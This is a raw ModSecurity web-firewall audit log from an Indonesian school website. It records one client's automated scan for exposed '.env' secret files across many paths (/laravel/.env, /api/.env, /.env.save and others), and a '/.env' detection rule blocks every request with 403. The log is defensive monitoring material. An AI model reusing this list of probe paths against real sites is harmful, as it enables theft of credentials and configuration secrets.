Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --349f071c-Z-- --3c8a3448-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2gAAANY 103.236.140.4 38338 103.236.140.4 8181 --3c8a3448-B-- GET /clientes/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3c8a3448-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c8a3448-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903070672 651 (- - -) Stopwatch2: 1745151903070672 651; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c8a3448-Z-- --ce606672-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2wAAAMI 103.236.140.4 38340 103.236.140.4 8181 --ce606672-B-- GET /clientes/laravel_inbox/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ce606672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce606672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903142362 721 (- - -) Stopwatch2: 1745151903142362 721; combined=264, p1=221, p2=0, p3=0, p4=0, p5=42, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce606672-Z-- --6fb5b330-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3AAAAMM 103.236.140.4 38342 103.236.140.4 8181 --6fb5b330-B-- GET /clientes/laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6fb5b330-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb5b330-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903216659 681 (- - -) Stopwatch2: 1745151903216659 681; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb5b330-Z-- --999ad00d-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3QAAANQ 103.236.140.4 38344 103.236.140.4 8181 --999ad00d-B-- GET /v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --999ad00d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --999ad00d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903287517 652 (- - -) Stopwatch2: 1745151903287517 652; combined=245, p1=213, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --999ad00d-Z-- --d7034f25-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3gAAAMo 103.236.140.4 38346 103.236.140.4 8181 --d7034f25-B-- GET /administrator/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d7034f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7034f25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903357846 774 (- - -) Stopwatch2: 1745151903357846 774; combined=315, p1=283, p2=0, p3=0, p4=0, p5=32, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7034f25-Z-- --23ea1c7a-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3wAAAMA 103.236.140.4 38348 103.236.140.4 8181 --23ea1c7a-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --23ea1c7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23ea1c7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903428125 659 (- - -) Stopwatch2: 1745151903428125 659; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23ea1c7a-Z-- --ad8c5f22-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4AAAANc 103.236.140.4 38350 103.236.140.4 8181 --ad8c5f22-B-- GET /website/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ad8c5f22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad8c5f22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903505110 662 (- - -) Stopwatch2: 1745151903505110 662; combined=270, p1=237, p2=0, p3=0, p4=0, p5=32, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad8c5f22-Z-- --0ebf2708-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4QAAAMg 103.236.140.4 38352 103.236.140.4 8181 --0ebf2708-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0ebf2708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ebf2708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903576982 769 (- - -) Stopwatch2: 1745151903576982 769; combined=336, p1=292, p2=0, p3=0, p4=0, p5=44, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ebf2708-Z-- --77867956-A-- [20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpAAAAA8 103.236.140.4 38354 103.236.140.4 8181 --77867956-B-- GET /local/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --77867956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77867956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903649936 631 (- - -) Stopwatch2: 1745151903649936 631; combined=227, p1=197, p2=0, p3=0, p4=0, p5=29, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77867956-Z-- --3bcd5409-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4gAAANE 103.236.140.4 38356 103.236.140.4 8181 --3bcd5409-B-- GET /home/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3bcd5409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bcd5409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903721728 792 (- - -) Stopwatch2: 1745151903721728 792; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bcd5409-Z-- --d6afde47-A-- [20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4wAAANg 103.236.140.4 38358 103.236.140.4 8181 --d6afde47-B-- GET /main/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d6afde47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6afde47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903792726 682 (- - -) Stopwatch2: 1745151903792726 682; combined=294, p1=260, p2=0, p3=0, p4=0, p5=33, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6afde47-Z-- --d2690c1e-A-- [20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpQAAAA0 103.236.140.4 38360 103.236.140.4 8181 --d2690c1e-B-- GET /pemerintah/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d2690c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2690c1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903863636 688 (- - -) Stopwatch2: 1745151903863636 688; combined=298, p1=256, p2=0, p3=0, p4=0, p5=41, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2690c1e-Z-- --bfd5b430-A-- [20/Apr/2025:19:25:03 +0700] aATnn1Tf0pL9EQC7JDUZ2AAAAEs 103.236.140.4 38362 103.236.140.4 8181 --bfd5b430-B-- GET /api2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --bfd5b430-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd5b430-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151903934988 760 (- - -) Stopwatch2: 1745151903934988 760; combined=293, p1=247, p2=0, p3=0, p4=0, p5=46, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd5b430-Z-- --e6e1c672-A-- [20/Apr/2025:19:25:04 +0700] aATnoFu16wJWB6g0mU8NpgAAAAU 103.236.140.4 38364 103.236.140.4 8181 --e6e1c672-B-- GET /api3/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e6e1c672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e1c672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904005097 748 (- - -) Stopwatch2: 1745151904005097 748; combined=297, p1=251, p2=0, p3=0, p4=0, p5=45, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e1c672-Z-- --45e4db5a-A-- [20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ2QAAAFc 103.236.140.4 38366 103.236.140.4 8181 --45e4db5a-B-- GET /webs/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --45e4db5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45e4db5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904076868 797 (- - -) Stopwatch2: 1745151904076868 797; combined=322, p1=278, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45e4db5a-Z-- --b003e624-A-- [20/Apr/2025:19:25:04 +0700] aATnoMTCDeBrh52UaHS-SQAAAJc 103.236.140.4 38368 103.236.140.4 8181 --b003e624-B-- GET /asset/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --b003e624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b003e624-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904147872 708 (- - -) Stopwatch2: 1745151904147872 708; combined=262, p1=226, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b003e624-Z-- --d0111454-A-- [20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ3AAAAFE 103.236.140.4 38378 103.236.140.4 8181 --d0111454-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d0111454-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0111454-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151904993278 935 (- - -) Stopwatch2: 1745151904993278 935; combined=386, p1=338, p2=0, p3=0, p4=0, p5=48, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0111454-Z-- --66824a73-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NpwAAAAM 103.236.140.4 38380 103.236.140.4 8181 --66824a73-B-- GET /sources/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --66824a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66824a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905064354 674 (- - -) Stopwatch2: 1745151905064354 674; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66824a73-Z-- --83c86872-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqAAAABU 103.236.140.4 38382 103.236.140.4 8181 --83c86872-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --83c86872-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83c86872-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905134682 670 (- - -) Stopwatch2: 1745151905134682 670; combined=256, p1=225, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
